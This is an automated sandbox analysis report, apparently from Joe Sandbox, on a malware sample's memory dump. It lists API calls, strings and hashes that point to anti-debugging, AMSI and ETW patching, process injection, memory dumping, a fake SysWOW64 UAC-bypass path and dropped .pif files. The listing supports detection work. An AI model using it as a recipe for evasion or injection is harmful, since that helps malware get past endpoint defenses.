Opcode ID: be0cdb1563bdd162b28f4dd5f6baa75fb29edecf4e13d734aca97b1401a9e21d
Instruction ID: 41ea2dcd9360a7034b0f0383cbc7afeb83fe0071f3644cab90cf1717219d6706
Opcode Fuzzy Hash: be0cdb1563bdd162b28f4dd5f6baa75fb29edecf4e13d734aca97b1401a9e21d
Instruction Fuzzy Hash: BC21D6717403097AEB11EAE4CC56FEF77BDAB08700F5004A5B740F71D0EAB4AA058B95

Function 02BDEC6C Relevance: 236.3, APIs: 9, Strings: 120, Instructions: 10535filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02BD881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02BD8903), ref: 02BD8860
Part of subcall function 02BD881C: GetProcAddress.KERNEL32(02C21384,00000000), ref: 02BD8879
Part of subcall function 02BD881C: FreeLibrary.KERNEL32(02C21384,00000000,02C21388,Function_000055D8,00000004,02C21398,02C21388,000186A3,00000040,02C2139C,02C21384,00000000,00000000,00000000,00000000,02BD8903), ref: 02BD88E3

Part of subcall function 02BDEB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02BDEF90,UacInitialize,02C1CF00,02BEAFD0,UacScan,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,ScanString), ref: 02BDEB92
Part of subcall function 02BDEB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02BDEBA4

Part of subcall function 02BDEBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02BDEBF8
Part of subcall function 02BDEBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02BDEC0A
Part of subcall function 02BDEBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02BDEC21

Part of subcall function 02BCC2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D158C8,?,02BDFBF6,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession), ref: 02BCC2FB

Part of subcall function 02BDDBA8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02BDDBE3
Part of subcall function 02BDDBA8: NtClose.NTDLL(?), ref: 02BDDC5D

Part of subcall function 02BC7E34: GetFileAttributesA.KERNEL32(00000000,?,02BE2A41,ScanString,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,Initialize), ref: 02BC7E3F

Part of subcall function 02BDDAC4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02BDDB03
Part of subcall function 02BDDAC4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02BDDB6A
Part of subcall function 02BDDAC4: NtClose.NTDLL(?), ref: 02BDDB73

Part of subcall function 02BD8798: LoadLibraryW.KERNEL32(?,?), ref: 02BD87AC
Part of subcall function 02BD8798: GetProcAddress.KERNEL32(02C21390,BCryptVerifySignature), ref: 02BD87C6
Part of subcall function 02BD8798: FreeLibrary.KERNEL32(02C21390,02C21390,BCryptVerifySignature,bcrypt,?,02C213D0,00000000,02C213A4,02BDA3BF,ScanString,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,Initialize), ref: 02BD8802

Part of subcall function 02BD8704: LoadLibraryW.KERNEL32(amsi), ref: 02BD870D
Part of subcall function 02BD8704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02BD876C

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,02BEB328), ref: 02BE49AF

Part of subcall function 02BDDA3C: RtlInitUnicodeString.NTDLL ref: 02BDDA64
Part of subcall function 02BDDA3C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02BDDA7A
Part of subcall function 02BDDA3C: NtDeleteFile.NTDLL(?), ref: 02BDDA99

MoveFileA.KERNEL32(00000000,00000000), ref: 02BE4BAF
MoveFileA.KERNEL32(00000000,00000000), ref: 02BE4C05

Strings

GetProxyDllInfo, xrefs: 02BDEFCF
OpenProcess, xrefs: 02BEA295
CreateProcessW, xrefs: 02BEA12F
tquery, xrefs: 02BE97E9
EnumServicesStatusA, xrefs: 02BEA0D5
DlpCheckIsCloudSyncApp, xrefs: 02BE9BA3
sppwmi, xrefs: 02BEA51F
NtWaitForSingleObject, xrefs: 02BE9D9A
DllGetActivationFactory, xrefs: 02BDF512
FlushInstructionCache, xrefs: 02BEA2FB
MiniDumpReadDumpStream, xrefs: 02BE89AA
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02BDFE2F
mssip32, xrefs: 02BDF250, 02BDF283, 02BDF2B6, 02BE98B5
advapi32, xrefs: 02BE8987
GET, xrefs: 02BE18FA
I_QueryTagInformation, xrefs: 02BE8982
LdrLoadDll, xrefs: 02BEA76C
NtAccessCheck, xrefs: 02BEA739
SLGatherMigrationBlob, xrefs: 02BEA53B
wintrust, xrefs: 02BDF0BF, 02BDF0F2, 02BDF125
@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%, xrefs: 02BE3359
Advapi, xrefs: 02BEA0DA, 02BEA0E9, 02BEA0F8, 02BEA107, 02BEA143, 02BEA152, 02BEA161
GZmMS1j, xrefs: 02BDECB4
SLGetEncryptedPIDEx, xrefs: 02BEA56E
Initialize, xrefs: 02BDED3F, 02BDFCC1, 02BDFE55, 02BDFFF3, 02BE0199, 02BE044E, 02BE0AF1, 02BE0F2D, 02BE13D7, 02BE14E1, 02BE1BC8, 02BE1EFA, 02BE221A, 02BE254E, 02BE26FC, 02BE2A55, 02BE2E0E, 02BE4FB6, 02BE534B, 02BE5747, 02BE590C, 02BE5B78, 02BE5CB6, 02BE5EBB, 02BE6E30, 02BE7AE8, 02BE8AF5, 02BE96E0, 02BE9A7E, 02BE9FAD, 02BEA367, 02BEA8B3
VirtualAllocEx, xrefs: 02BEA22F
BCryptRegisterProvider, xrefs: 02BDF3B4
sys.thgiseurt, xrefs: 02BE3EC4
C:\Windows\System32\, xrefs: 02BDF8AF, 02BE70B3, 02BE7DFB
RtlCreateQueryDebugBuffer, xrefs: 02BE9E00
NtOpenProcess, xrefs: 02BE89D2
SLLoadApplicationPolicies, xrefs: 02BE962B
FindCertsByIssuer, xrefs: 02BDF10E
NtMapViewOfSection, xrefs: 02BEA6A0
MiniDumpWriteDump, xrefs: 02BE8996
CreateProcessA, xrefs: 02BEA120
WinHttp.WinHttpRequest.5.1, xrefs: 02BE17E1
ScanBuffer, xrefs: 02BDEE6B, 02BDF1C3, 02BDF3ED, 02BDF954, 02BDFA61, 02BDFB79, 02BDFF4D, 02BE00EB, 02BE0291, 02BE03B1, 02BE0546, 02BE063E, 02BE08A7, 02BE0A4D, 02BE0BE9, 02BE0CFF, 02BE0D8D, 02BE10A1, 02BE1342, 02BE1453, 02BE15F0, 02BE199B, 02BE1AA7, 02BE1CC5, 02BE1DE2, 02BE20FD, 02BE219E, 02BE2312, 02BE24D2, 02BE27F4, 02BE2BEB, 02BE2E8A, 02BE2F1B, 02BE32D5, 02BE34B7, 02BE362B, 02BE37AE, 02BE382A, 02BE39E1, 02BE3BEB, 02BE3E49, 02BE407B, 02BE42BF, 02BE4507, 02BE47BD, 02BE4923, 02BE4AB8, 02BE4DF0, 02BE512A, 02BE5443, 02BE57C3, 02BE5AFC, 02BE5DAE, 02BE5FB3, 02BE6119, 02BE628D, 02BE6309, 02BE6EAC, 02BE6F3D, 02BE736D, 02BE7500, 02BE765C, 02BE7754, 02BE7C71, 02BE7F3E, 02BE80E4, 02BE8271, 02BE8405, 02BE8584, 02BE87FB, 02BE88F3, 02BE8D0F, 02BE8FE8, 02BE915C, 02BE9392, 02BE9424, 02BE975C, 02BE9AFA, 02BEA029, 02BEA92F
NtOpenObjectAuditAlarm, xrefs: 02BE896E
NtAlertResumeThread, xrefs: 02BE9D34
CreateProcessAsUserA, xrefs: 02BEA13E
http, xrefs: 02BE15CD
bcrypt, xrefs: 02BDF365, 02BDF398, 02BDF3CB, 02BE99E0
ScanString, xrefs: 02BDEDA3, 02BDF032, 02BDF147, 02BDF2D8, 02BDF469, 02BDF6F2, 02BDF833, 02BDFDB9, 02BE09D1, 02BE0B6D, 02BE0FA9, 02BE11C4, 02BE1240, 02BE155D, 02BE1883, 02BE1B4C, 02BE1F89, 02BE23BA, 02BE25CA, 02BE2680, 02BE29AF, 02BE2AD1, 02BE2D92, 02BE31DD, 02BE3CD5, 02BE414B, 02BE4340, 02BE4CF8, 02BE4E92, 02BE51D7, 02BE559B, 02BE5C3A, 02BE6420, 02BE6597, 02BE664F, 02BE6CBC, 02BE7156, 02BE75BD, 02BE7BE0, 02BE8687, 02BE8A79, 02BE8E62, 02BE921E, 02BE951C, 02BE98D7, 02BE9CBE, 02BE9EB5, 02BEA45F
DlpNotifyPreDragDrop, xrefs: 02BE9B70
NtOpenFile, xrefs: 02BEA805
ntdll, xrefs: 02BE8973, 02BE89C3, 02BE89D7, 02BE9D4B, 02BE9D7E, 02BE9DB1, 02BE9DE4, 02BE9E17, 02BEA5B8, 02BEA5EB, 02BEA61E, 02BEA651, 02BEA684, 02BEA6B7, 02BEA6EA, 02BEA71D, 02BEA750, 02BEA783, 02BEA7B6, 02BEA7E9, 02BEA81C, 02BEA84F, 02BEA882
UacUninitialize, xrefs: 02BE2D16, 02BE3013, 02BE310B, 02BE38E9, 02BE3F83
spp, xrefs: 02BE981C, 02BE984F, 02BEA4EC
NtQuerySystemInformation, xrefs: 02BEA099
C:\\Users\\Public\\Libraries\\, xrefs: 02BE4B5E, 02BE4BB4, 02BE58AF
dbgcore, xrefs: 02BE899B, 02BE89AF
NtOpenSection, xrefs: 02BEA63A
psapi, xrefs: 02BE9882
EnumServicesStatusW, xrefs: 02BEA0E4
endpointdlp, xrefs: 02BE9B87, 02BE9BBA, 02BE9BED, 02BE9C20
CryptSIPGetSignedDataMsg, xrefs: 02BDF29F
sppc, xrefs: 02BE95A9, 02BE95DC, 02BE960F, 02BE9642, 02BEA552, 02BEA585
SLGetSLIDList, xrefs: 02BE95C5
NtDeviceIoControlFile, xrefs: 02BEA0A8
C:\\Windows \\SysWOW64\\, xrefs: 02BE3AC6, 02BE3EDA
FX.c, xrefs: 02BE46F3
CryptSIPGetInfo, xrefs: 02BDF239
NtQueryInformationThread, xrefs: 02BEA607
SLGetGenuineInformation, xrefs: 02BE9592
DlpGetArchiveFileTraceInfo, xrefs: 02BE9BD6
NtSetSecurityObject, xrefs: 02BE89BE
SetUnhandledExceptionFilter, xrefs: 02BEA32E
RetailTracerEnable, xrefs: 02BE97D2
HotKey=, xrefs: 02BE6629
[InternetShortcut], xrefs: 02BE6490
NtQuerySecurityObject, xrefs: 02BEA706
DlpGetWebSiteAccess, xrefs: 02BE9C09
VirtualProtect, xrefs: 02BEA262
NtGetWriteWatch, xrefs: 02BEA5A1
DllGetClassObject, xrefs: 02BDEFA8, 02BDF4DF, 02BE9838, 02BEA508
SLIsGenuineLocalEx, xrefs: 02BE95F8
C:\Users\Public\, xrefs: 02BE317B, 02BE54C8, 02BE673B
EnumServicesStatusExA, xrefs: 02BEA0F3
EtwEventWrite, xrefs: 02BEA86B
CreateProcessWithLogonW, xrefs: 02BEA15C
NtQueryDirectoryFile, xrefs: 02BEA0B7
WriteVirtualMemory, xrefs: 02BEA2C8
VirtualAlloc, xrefs: 02BEA1FC
kernel32, xrefs: 02BEA213, 02BEA246, 02BEA279, 02BEA2AC, 02BEA2DF, 02BEA312, 02BEA345
CreateProcessAsUserW, xrefs: 02BEA14D, 02BEA16B
smartscreenps, xrefs: 02BDF4F6, 02BDF529, 02BDF55C
URL=file:", xrefs: 02BE649F
UacInitialize, xrefs: 02BDEF33, 02BDF5FA, 02BDFD3D, 02BE3D51, 02BE41C7, 02BE49C0, 02BE4C7C, 02BE5032, 02BE551F, 02BE7035, 02BE8877, 02BE8C93
ieproxy, xrefs: 02BDEFB9, 02BDEFE0, 02BDF010
NtCreateSection, xrefs: 02BEA66D
Kernel32, xrefs: 02BEA125, 02BEA134, 02BEA170
BCryptVerifySignature, xrefs: 02BDF34E, 02BE99C9
GetProcessMemoryInfo, xrefs: 02BE986B
Ntdll, xrefs: 02BEA09E, 02BEA0AD, 02BEA0BC, 02BEA0CB
RtlAllocateHeap, xrefs: 02BE9D67, 02BE9DCD
CryptSIPVerifyIndirectData, xrefs: 02BDF26C, 02BE989E
NEO.c, xrefs: 02BE443D
C:\Users\Public\aken.pif, xrefs: 02BE4B49
WintrustAddActionID, xrefs: 02BDF0DB
UacScan, xrefs: 02BDEECF, 02BDF57E, 02BDF676, 02BDFC45, 02BE082B, 02BE0E09, 02BE176B, 02BE1E7E, 02BE308F, 02BE3259, 02BE33BA, 02BE3533, 02BE36B6, 02BE3887, 02BE3965, 02BE3AF3, 02BE3FFF, 02BE43BC, 02BE45F1, 02BE52CF, 02BE583F, 02BE5A04, 02BE5D32, 02BE5E3F, 02BE609D, 02BE6195, 02BE6D38, 02BE70DA, 02BE72F1, 02BE7484, 02BE76D8, 02BE7B64, 02BE7CED, 02BE7E46, 02BE7FEC, 02BE8179, 02BE830D, 02BE848C, 02BE8703, 02BE8B71, 02BE8D8B, 02BE8F6C, 02BE90E0, 02BE9316, 02BEA186
.url, xrefs: 02BE54D3
EnumProcessModules, xrefs: 02BEA111
NtWriteVirtualMemory, xrefs: 02BEA7D2
C:\Users\Public\alpha.pif, xrefs: 02BE4B2E
psapi, xrefs: 02BEA116
LdrGetProcedureAddress, xrefs: 02BEA79F
SxTracerGetThreadContextDebug, xrefs: 02BE9805, 02BEA4D5
EtwEventWriteEx, xrefs: 02BEA838
C:\\Windows \\SysWOW64\\svchost.exe, xrefs: 02BE36A0
lld.SLITUTEN, xrefs: 02BE3AB0
EnumServicesStatusExW, xrefs: 02BEA102
NtQueryVirtualMemory, xrefs: 02BEA5D4
RtlQueryProcessDebugInformation, xrefs: 02BEA0C6
IconIndex=, xrefs: 02BE64F5
OpenSession, xrefs: 02BDECDB, 02BDEE07, 02BDF7B7, 02BDF8D8, 02BDF9E5, 02BDFAFD, 02BDFED1, 02BE006F, 02BE0215, 02BE0335, 02BE04CA, 02BE05C2, 02BE07AF, 02BE0955, 02BE0C83, 02BE0EB1, 02BE1025, 02BE1148, 02BE12C6, 02BE166C, 02BE16EF, 02BE1807, 02BE191F, 02BE1A2B, 02BE1C49, 02BE1D66, 02BE2005, 02BE2081, 02BE2296, 02BE2436, 02BE2778, 02BE2933, 02BE2B4D, 02BE2C67, 02BE2F97, 02BE3436, 02BE35AF, 02BE3732, 02BE3B6F, 02BE3DCD, 02BE3F07, 02BE4243, 02BE448B, 02BE466D, 02BE4741, 02BE48A7, 02BE4A3C, 02BE4D74, 02BE4F0E, 02BE50AE, 02BE5253, 02BE53C7, 02BE5617, 02BE56CB, 02BE5988, 02BE5A80, 02BE5F37, 02BE6211, 02BE6385, 02BE651B, 02BE66CB, 02BE6DB4, 02BE6FB9, 02BE71D2, 02BE7275, 02BE7408, 02BE77D0, 02BE7A6C, 02BE7D69, 02BE7EC2, 02BE8068, 02BE81F5, 02BE8389, 02BE8508, 02BE860B, 02BE877F, 02BE89FD, 02BE8BED, 02BE8EDE, 02BE9064, 02BE929A, 02BE94A0, 02BE9664, 02BE9953, 02BE9A02, 02BE9C42, 02BE9E39, 02BE9F31, 02BEA3E3, 02BEA9AB
DllRegisterServer, xrefs: 02BDEFF9, 02BDF545
TrustOpenStores, xrefs: 02BDF0A8
BCryptQueryProviderRegistration, xrefs: 02BDF381
NtReadVirtualMemory, xrefs: 02BEA6D3

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: FilePath$Library$AddressModuleNameProc$FreeHandleName_$CloseLoadMove$AttributesCheckDebuggerDeleteInitPresentRemoteSleepStringUnicodeWrite
String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
API String ID: 4208238443-2905671141
Opcode ID: 41b8ab820d41a88390752d678ff86e4f86d4d623ebea2d8e8d690730c7af60e7
Instruction ID: 2cb912228b39ac68268394468256c4debb8d2d590b63c4bbf08855417183b7e5
Opcode Fuzzy Hash: 41b8ab820d41a88390752d678ff86e4f86d4d623ebea2d8e8d690730c7af60e7
Instruction Fuzzy Hash: 18240976B501589FDB11FB64DC90ADE73BABF95300F2045EAE00AA7218DB71AF858F41

Function 02BE786F Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2772
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02BD881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02BD8903), ref: 02BD8860
Part of subcall function 02BD881C: GetProcAddress.KERNEL32(02C21384,00000000), ref: 02BD8879
Part of subcall function 02BD881C: FreeLibrary.KERNEL32(02C21384,00000000,02C21388,Function_000055D8,00000004,02C21398,02C21388,000186A3,00000040,02C2139C,02C21384,00000000,00000000,00000000,00000000,02BD8903), ref: 02BD88E3

CreateProcessAsUserW.ADVAPI32(02D157D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02D157DC,02D15820,OpenSession,02C1CF00,02BEAFD0,UacScan,02C1CF00), ref: 02BE7E31
ResumeThread.KERNEL32(02D15824,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,UacScan,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0), ref: 02BE847B
CloseHandle.KERNEL32(02D15820,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,UacScan,02C1CF00,02BEAFD0,02D15824,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00), ref: 02BE85FA

Part of subcall function 02BD8798: LoadLibraryW.KERNEL32(?,?), ref: 02BD87AC
Part of subcall function 02BD8798: GetProcAddress.KERNEL32(02C21390,BCryptVerifySignature), ref: 02BD87C6
Part of subcall function 02BD8798: FreeLibrary.KERNEL32(02C21390,02C21390,BCryptVerifySignature,bcrypt,?,02C213D0,00000000,02C213A4,02BDA3BF,ScanString,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,Initialize), ref: 02BD8802

CloseHandle.KERNEL32(02D15820,02D15820,ScanBuffer,02C1CF00,02BEAFD0,UacInitialize,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,OpenSession,02C1CF00,02BEAFD0,UacScan,02C1CF00), ref: 02BE89EC

Part of subcall function 02BDDAC4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02BDDB03
Part of subcall function 02BDDAC4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02BDDB6A
Part of subcall function 02BDDAC4: NtClose.NTDLL(?), ref: 02BDDB73

Part of subcall function 02BD8184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02BD820E), ref: 02BD81F0

ExitProcess.KERNEL32(00000000,OpenSession,02C1CF00,02BEAFD0,ScanBuffer,02C1CF00,02BEAFD0,Initialize,02C1CF00,02BEAFD0,00000000,00000000,00000000,ScanString,02C1CF00,02BEAFD0), ref: 02BEAA1D

Strings

SLGetGenuineInformation, xrefs: 02BE9592
DlpGetArchiveFileTraceInfo, xrefs: 02BE9BD6
OpenProcess, xrefs: 02BEA295
CreateProcessW, xrefs: 02BEA12F
SetUnhandledExceptionFilter, xrefs: 02BEA32E
NtSetSecurityObject, xrefs: 02BE89BE
EnumServicesStatusA, xrefs: 02BEA0D5
tquery, xrefs: 02BE97E9
DlpCheckIsCloudSyncApp, xrefs: 02BE9BA3
RetailTracerEnable, xrefs: 02BE97D2
NtQuerySecurityObject, xrefs: 02BEA706
sppwmi, xrefs: 02BEA51F
DlpGetWebSiteAccess, xrefs: 02BE9C09
NtWaitForSingleObject, xrefs: 02BE9D9A
VirtualProtect, xrefs: 02BEA262
FlushInstructionCache, xrefs: 02BEA2FB
MiniDumpReadDumpStream, xrefs: 02BE89AA
NtGetWriteWatch, xrefs: 02BEA5A1
mssip32, xrefs: 02BE98B5
advapi32, xrefs: 02BE8987
DllGetClassObject, xrefs: 02BE9838, 02BEA508
LdrLoadDll, xrefs: 02BEA76C
NtAccessCheck, xrefs: 02BEA739
SLGatherMigrationBlob, xrefs: 02BEA53B
SLIsGenuineLocalEx, xrefs: 02BE95F8
I_QueryTagInformation, xrefs: 02BE8982
EnumServicesStatusExA, xrefs: 02BEA0F3
Advapi, xrefs: 02BEA0DA, 02BEA0E9, 02BEA0F8, 02BEA107, 02BEA143, 02BEA152, 02BEA161
SLGetEncryptedPIDEx, xrefs: 02BEA56E
EtwEventWrite, xrefs: 02BEA86B
CreateProcessWithLogonW, xrefs: 02BEA15C
Initialize, xrefs: 02BE78F8, 02BE7AE8, 02BE8AF5, 02BE96E0, 02BE9A7E, 02BE9FAD, 02BEA367, 02BEA8B3
VirtualAllocEx, xrefs: 02BEA22F
WriteVirtualMemory, xrefs: 02BEA2C8
VirtualAlloc, xrefs: 02BEA1FC
NtQueryDirectoryFile, xrefs: 02BEA0B7
C:\Windows\System32\, xrefs: 02BE7DFB
RtlCreateQueryDebugBuffer, xrefs: 02BE9E00
kernel32, xrefs: 02BEA213, 02BEA246, 02BEA279, 02BEA2AC, 02BEA2DF, 02BEA312, 02BEA345
NtOpenProcess, xrefs: 02BE89D2
CreateProcessAsUserW, xrefs: 02BEA14D, 02BEA16B
UacInitialize, xrefs: 02BE8877, 02BE8C93
NtCreateSection, xrefs: 02BEA66D
Kernel32, xrefs: 02BEA125, 02BEA134, 02BEA170
SLLoadApplicationPolicies, xrefs: 02BE962B
BCryptVerifySignature, xrefs: 02BE99C9
NtMapViewOfSection, xrefs: 02BEA6A0
GetProcessMemoryInfo, xrefs: 02BE986B
Ntdll, xrefs: 02BEA09E, 02BEA0AD, 02BEA0BC, 02BEA0CB
RtlAllocateHeap, xrefs: 02BE9D67, 02BE9DCD
CryptSIPVerifyIndirectData, xrefs: 02BE989E
MiniDumpWriteDump, xrefs: 02BE8996
CreateProcessA, xrefs: 02BEA120
ScanBuffer, xrefs: 02BE7C71, 02BE7F3E, 02BE80E4, 02BE8271, 02BE8405, 02BE8584, 02BE87FB, 02BE88F3, 02BE8D0F, 02BE8FE8, 02BE915C, 02BE9392, 02BE9424, 02BE975C, 02BE9AFA, 02BEA029, 02BEA92F
NtOpenObjectAuditAlarm, xrefs: 02BE896E
CreateProcessAsUserA, xrefs: 02BEA13E
NtAlertResumeThread, xrefs: 02BE9D34
UacScan, xrefs: 02BE7B64, 02BE7CED, 02BE7E46, 02BE7FEC, 02BE8179, 02BE830D, 02BE848C, 02BE8703, 02BE8B71, 02BE8D8B, 02BE8F6C, 02BE90E0, 02BE9316, 02BEA186
bcrypt, xrefs: 02BE99E0
EnumProcessModules, xrefs: 02BEA111
ScanString, xrefs: 02BE7974, 02BE7BE0, 02BE8687, 02BE8A79, 02BE8E62, 02BE921E, 02BE951C, 02BE98D7, 02BE9CBE, 02BE9EB5, 02BEA45F
DlpNotifyPreDragDrop, xrefs: 02BE9B70
NtOpenFile, xrefs: 02BEA805
NtWriteVirtualMemory, xrefs: 02BEA7D2
ntdll, xrefs: 02BE8973, 02BE89C3, 02BE89D7, 02BE9D4B, 02BE9D7E, 02BE9DB1, 02BE9DE4, 02BE9E17, 02BEA5B8, 02BEA5EB, 02BEA61E, 02BEA651, 02BEA684, 02BEA6B7, 02BEA6EA, 02BEA71D, 02BEA750, 02BEA783, 02BEA7B6, 02BEA7E9, 02BEA81C, 02BEA84F, 02BEA882
psapi, xrefs: 02BEA116
spp, xrefs: 02BE981C, 02BE984F, 02BEA4EC
NtQuerySystemInformation, xrefs: 02BEA099
LdrGetProcedureAddress, xrefs: 02BEA79F
SxTracerGetThreadContextDebug, xrefs: 02BE9805, 02BEA4D5
dbgcore, xrefs: 02BE899B, 02BE89AF
EtwEventWriteEx, xrefs: 02BEA838
NtOpenSection, xrefs: 02BEA63A
EnumServicesStatusW, xrefs: 02BEA0E4
psapi, xrefs: 02BE9882
endpointdlp, xrefs: 02BE9B87, 02BE9BBA, 02BE9BED, 02BE9C20
sppc, xrefs: 02BE95A9, 02BE95DC, 02BE960F, 02BE9642, 02BEA552, 02BEA585
EnumServicesStatusExW, xrefs: 02BEA102
SLGetSLIDList, xrefs: 02BE95C5
NtDeviceIoControlFile, xrefs: 02BEA0A8
NtQueryVirtualMemory, xrefs: 02BEA5D4
RtlQueryProcessDebugInformation, xrefs: 02BEA0C6
OpenSession, xrefs: 02BE787C, 02BE79F0, 02BE7A6C, 02BE7D69, 02BE7EC2, 02BE8068, 02BE81F5, 02BE8389, 02BE8508, 02BE860B, 02BE877F, 02BE89FD, 02BE8BED, 02BE8EDE, 02BE9064, 02BE929A, 02BE94A0, 02BE9664, 02BE9953, 02BE9A02, 02BE9C42, 02BE9E39, 02BE9F31, 02BEA3E3, 02BEA9AB
NtQueryInformationThread, xrefs: 02BEA607
NtReadVirtualMemory, xrefs: 02BEA6D3

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: CloseHandleLibrary$AddressFreePathProcProcess$CacheCreateExitFileFlushInstructionLoadModuleNameName_ResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreate